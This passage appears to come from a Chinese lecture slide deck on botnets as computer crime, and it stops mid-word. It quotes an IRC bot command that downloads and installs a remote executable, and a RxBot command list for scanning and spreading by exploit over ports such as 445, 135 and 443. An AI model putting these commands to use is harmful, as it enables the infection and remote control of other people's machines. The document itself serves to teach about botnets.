第三章计算机犯罪-僵尸网络.pptVIP

观察到的IRC Bot一些高级功能 进一步扩展: 更新: .http.update http://server/~mugenxu/rBot.exe c:\msy32awds.exe 1 RxBot支持的破解命令 ri0t r00t b0t comes with many exploits listed below is how to use them: -r = random range scanner from the Bot Ip Ex: the bot connect from ip ( 5 ) the -r scanning from to 55 but in random method -b = same -r but in Sequential method from to 55 -a = long range scanner from first range of bot ip Ex: to 55 -s = silent u can used with all Bot Commands, no reply msg from the bots x = ip range ex: 0 to 255 u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r 100 = scanner threads 5 = delay in sec 999 = time of scanner .advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445 .advscan iis5ssl 100 5 999 -b * IIS 5 SSL Exploit Spreader Using Port 443 .advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135 .advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445 .advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is **** ) .advscan dcom2-135 100 5 999 -a -s * Dcom2 Exploit Spreader Using Port 135 .advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445 .advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745 .advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745 .advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80 .advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135 .advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445 .advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129 .advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000 .advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127 .advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139 .advscan nt